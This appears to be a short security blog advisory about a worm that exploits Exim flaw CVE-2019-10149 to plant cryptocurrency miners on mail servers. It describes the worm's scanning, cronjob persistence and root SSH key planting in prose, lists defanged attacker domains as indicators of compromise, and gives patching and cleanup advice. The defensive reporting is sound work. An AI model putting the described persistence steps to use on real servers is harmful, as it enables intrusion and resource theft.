Millions Of Servers Attacked By Exim Mining Worm

A new worm has been observed exploiting the recently disclosed Exim vulnerability CVE-2019-10149, to install cryptocurrency miners on affected mail servers.

The worm identifies new target servers using a Python-based port scanning module. It will then execute an initial script to install itself on the new servers. Several scripts are then downloaded and executed to create cronjobs in order to maintain persistence and download other payloads. The worm will also add its own RSA authentication key to the server’s root directory.

Look for any unfamiliar cronjobs in your crontab and remove them. Restore legitimate cron jobs from existing backups.

At the time of publication, only a cryptocurrency mining module has been seen being installed by the worm, although it is possible that other payloads may be installed in the future.

Indicators of Compromise

URL’s

  • an7kmd2wp4xo7hpr.onion[.]sh
  • an7kmd2wp4xo7hpr.tor2web[.]io
  • an7kmd2wp4xo7hpr.tor2web[.]su

Resolution

Patch every EXIM installation you have in your organization and make sure that it is updated to the most recent version, 4.92 at the current time.

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: